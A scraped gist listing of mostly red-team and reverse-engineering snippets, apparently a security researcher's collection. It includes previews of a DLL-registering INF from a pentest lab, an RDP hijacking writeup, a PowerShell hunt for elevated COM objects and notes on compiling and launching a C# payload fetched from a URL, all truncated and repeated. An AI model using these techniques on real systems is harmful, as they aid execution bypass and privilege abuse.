PeterG75

## safari-reaper.html
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <style>
        body {
            background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA

## upx.py
from x64dbgpy.pluginsdk import *
import sys

cip = register.GetCIP()
if memory.ReadByte(cip) != 0x60:
    gui.Message("Start at UPX entry point (1:[CIP]==0x60)")
    exit(0)

x64dbg.DbgCmdExecDirect("bc")
x64dbg.DbgCmdExecDirect("bphwc")

## msvbvm50.pdb
0:000> lm
start    end        module name
00400000 00407000   image00400000   (deferred)
740c0000 7420d000   MSVBVM50   (pdb symbols)          c:\symbols\msvbvm50.pdb\3AEF4F631\msvbvm50.pdb
77120000 771ab000   OLEAUT32   (deferred)
774e0000 7761e000   ole32      (deferred)
77c10000 77c68000   msvcrt     (deferred)
77dd0000 77e6b000   ADVAPI32   (deferred)
77e70000 77f03000   RPCRT4     (deferred)
77f10000 77f59000   GDI32      (deferred)

## gist:c16a731bed495b48af68d604690093aa
from idautils import *
from idaapi import *
from idc import *
import re

def findStackStrings(func_addr):
	print "--------------------------------------NEW RUN---------------------------------------------------"
	func = get_func(func_addr)
	start = func.startEA
	end = func.endEA

## time-travel.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                PeterG75
                / time-travel.md
            
            
              Created
              August 1, 2018 02:07
                — forked from jasonLaster/time-travel.md
            
          
    Time Travel Debugging

Time Travel refers to the ability to record a tab and later replay it ([WebReplay][wrr]). The technology is useful for local development, where you might want to:

pause and step forwards or backwards
pause and rewind to a prior state
rewind to the time a console message was logged
rewind to the time an element had a certain style or layout
rewind to the time a network asset loaded


## pentestlab-dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll

## RDP_Eavesdropping_Hijacking
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions.  Here is a gist of (semi) interesting findings
that is not very new...

===========
Inspiration
===========
As you may already know...

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## get-elevated-com.ps1
$path = "REGISTRY::HKEY_CLASSES_ROOT\CLSID\"
Get-ChildItem -Path $path -Recurse | foreach {
    $CurrentKey = Get-ItemProperty -Path $_.PsPath
     if ($CurrentKey.PSChildName -match "Elevation") {
      $details = Get-ItemProperty -Path $CurrentKey.PSParentPath
      Out-File -FilePath ".\elevation.txt" -InputObject $details -Append
   }
}

## Build_In_Memory_CSharp_Project.txt
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

Basic gist after running PS script statements:

- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
- Launch program (payload)
	<!DOCTYPE html>
	<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<style>
	body {
	background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA
	from x64dbgpy.pluginsdk import *
	import sys

	cip = register.GetCIP()
	if memory.ReadByte(cip) != 0x60:
	gui.Message("Start at UPX entry point (1:[CIP]==0x60)")
	exit(0)

	x64dbg.DbgCmdExecDirect("bc")
	x64dbg.DbgCmdExecDirect("bphwc")
	0:000> lm
	start end module name
	00400000 00407000 image00400000 (deferred)
	740c0000 7420d000 MSVBVM50 (pdb symbols) c:\symbols\msvbvm50.pdb\3AEF4F631\msvbvm50.pdb
	77120000 771ab000 OLEAUT32 (deferred)
	774e0000 7761e000 ole32 (deferred)
	77c10000 77c68000 msvcrt (deferred)
	77dd0000 77e6b000 ADVAPI32 (deferred)
	77e70000 77f03000 RPCRT4 (deferred)
	77f10000 77f59000 GDI32 (deferred)
	from idautils import *
	from idaapi import *
	from idc import *
	import re

	def findStackStrings(func_addr):
	print "--------------------------------------NEW RUN---------------------------------------------------"
	func = get_func(func_addr)
	start = func.startEA
	end = func.endEA
	[version]
	Signature=$chicago$
	AdvancedINF=2.5

	[DefaultInstall_SingleUser]
	RegisterOCXs=RegisterOCXSection

	[RegisterOCXSection]
	C:\Users\test.PENTESTLAB\pentestlab.dll
	RDP Eavesdropping and Hijacking
	*******************************
	I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
	that is not very new...

	===========
	Inspiration
	===========
	As you may already know...
	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	$path = "REGISTRY::HKEY_CLASSES_ROOT\CLSID\"
	Get-ChildItem -Path $path -Recurse \| foreach {
	$CurrentKey = Get-ItemProperty -Path $_.PsPath
	if ($CurrentKey.PSChildName -match "Elevation") {
	$details = Get-ItemProperty -Path $CurrentKey.PSParentPath
	Out-File -FilePath ".\elevation.txt" -InputObject $details -Append
	}
	}
	After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

	These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

	Basic gist after running PS script statements:

	- Loads C# project from file or web URL
	- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
	- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
	- Launch program (payload)